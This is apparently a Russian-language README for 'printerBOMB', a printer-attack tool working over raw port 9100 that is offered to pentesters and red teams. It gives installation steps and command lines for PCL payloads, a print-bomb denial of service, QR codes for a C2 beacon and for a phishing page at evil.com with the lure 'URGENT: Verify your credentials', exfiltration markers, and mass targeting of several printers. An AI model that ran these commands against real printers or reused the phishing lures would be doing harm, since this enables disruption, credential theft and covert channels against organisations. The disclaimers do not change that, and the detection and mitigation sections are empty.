
Фреймворк для эксплуатации принтеров с целью тестирования безопасности через raw-порт 9100, включающий доставку PCL-полезных нагрузок, DoS-бомбинг, C2 QR-коды, фишинговые QR-коды и скрытые маркеры эксфильтрации.
____ _ _ _____ _ _ ___
| _ \| | | | | __ \ | \ | | _|
| |_) | | __ | | __ | |__) | __ | \| | | _
| _ <| | / _| | |/ / | ___/ ' \| . ` | | (_)
| |_) | | \_| | < | | | (_) | |\ | |___ |
|____/|_| \__ |_|\_\|_| \___/|_| \_|_____|
_ _ | |
| | | | | |
| |_| | | |
\___/ |_|
______
|______|
| |
|______|
🖨️ printerBOMB - Фреймворк для атак на очередь печати
Эксплуатация упускаемого из виду вектора атаки: ваши сетевые принтеры
Разработано: Azhari Ramadhan 🔥
PrintHack — это продвинутый инструмент для эксплуатации принтеров, предназначенный для специалистов по безопасности, red team-специалистов и пентестеров. Этот инструмент использует raw-протокол спулинга печати (порт 9100) для проведения оценок безопасности, тестирования уязвимостей принтеров и моделирования реальных сценариев атак.
⚠️ ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ: Этот инструмент предназначен только для легитимного тестирования безопасности и образовательных целей. Используйте ответственно и только на системах, которыми вы владеете или на тестирование которых у вас есть явное разрешение.
git clone https://github.com/AzhariRamadhan/CVE-PORT-9100.git
cd CVE-PORT-9100
pip install -r requirements.txt
Pillow - Обработка изображенийqrcode - Генерация QR-кодовrequests - HTTP-запросыpip install Pillow qrcode requests
# Проверка подключения к принтеру
python3 printerhack.py -t 192.168.1.100 --check
# Отправка тестовой страницы
python3 printerhack.py -t 192.168.1.100 --test
# Печать пользовательского сообщения
python3 printerhack.py -t 192.168.1.100 -m "Hello from Red Team!"
# Печать изображения по URL (преобразование в ASCII)
python3 printerhack.py -t 192.168.1.100 -i http://example.com/image.png
# Отправка PCL-полезной нагрузки
python3 printerhack.py -t 192.168.1.100 --pcl
# Print bomb (DoS - 10MB)
python3 printerhack.py -t 192.168.1.100 --bomb 10
# Печать QR-кода C2-обратного вызова
python3 printerhack.py -t 192.168.1.100 --c2 "http://c2-server:8080/beacon"
# Печать фишингового QR-кода
python3 printerhack.py -t 192.168.1.100 --phish "http://evil.com/login" "URGENT: Verify your credentials"
# Печать на несколько принтеров из файла
echo -e "192.168.1.100\n192.168.1.101\n192.168.1.102" > targets.txt
python3 printerhack.py -f targets.txt -m "Security Test Message"
Печать скрытых сообщений или инструкций на скомпрометированных принтерах в сценариях физического доступа.
Печать QR-кодов, ведущих на страницы сбора учётных данных, замаскированных под уведомления безопасности.
Использование вывода принтера как скрытого канала эксфильтрации закодированных данных.
Проверка устойчивости организации к атакам типа «отказ в обслуживании» на основе принтеров.
Перечисление и идентификация принтеров в сети.
Индикаторы обнаружения:
Стратегии смягчения:
THIS TOOL IS PROVIDED "AS IS" FOR LEGITIMATE SECURITY TESTING ONLY.
THE AUTHOR IS NOT LIABLE FOR ANY MISUSE OF THIS TOOL.
ALWAYS obtain written authorization before testing any system.
Unauthorized use may violate Computer Fraud and Abuse Act (CFAA)
and similar laws in your jurisdiction.
Developed by: Azhari Ramadhan
Вклад приветствуется! Пожалуйста, убедитесь, что:
Разработчик: Azhari Ramadhan 🔥
Лицензия MIT — Подробности см. в LICENSE
🖨️ printerBOMB - Эксплуатация последней линии обороны
Опережайте атакующих, думая как они
Сделано с 🔥 Azhari Ramadhan
| Функция | Описание |
|---|
--check | Проверка подключения к принтеру |
--test | Отправка тестовой страницы |
--message | Печать пользовательских полезных нагрузок |
--image | Печать изображения по URL (ASCII-арт) |
--pcl | Отправка полезной нагрузки в формате PCL |
--bomb | DoS-атака (массивная полезная нагрузка) |
--c2 | Печать QR-кода C2-обратного вызова |
--phish | Печать фишингового QR-кода |
--exfil | Печать маркера эксфильтрации данных |
--file | Массовая печать на несколько целей |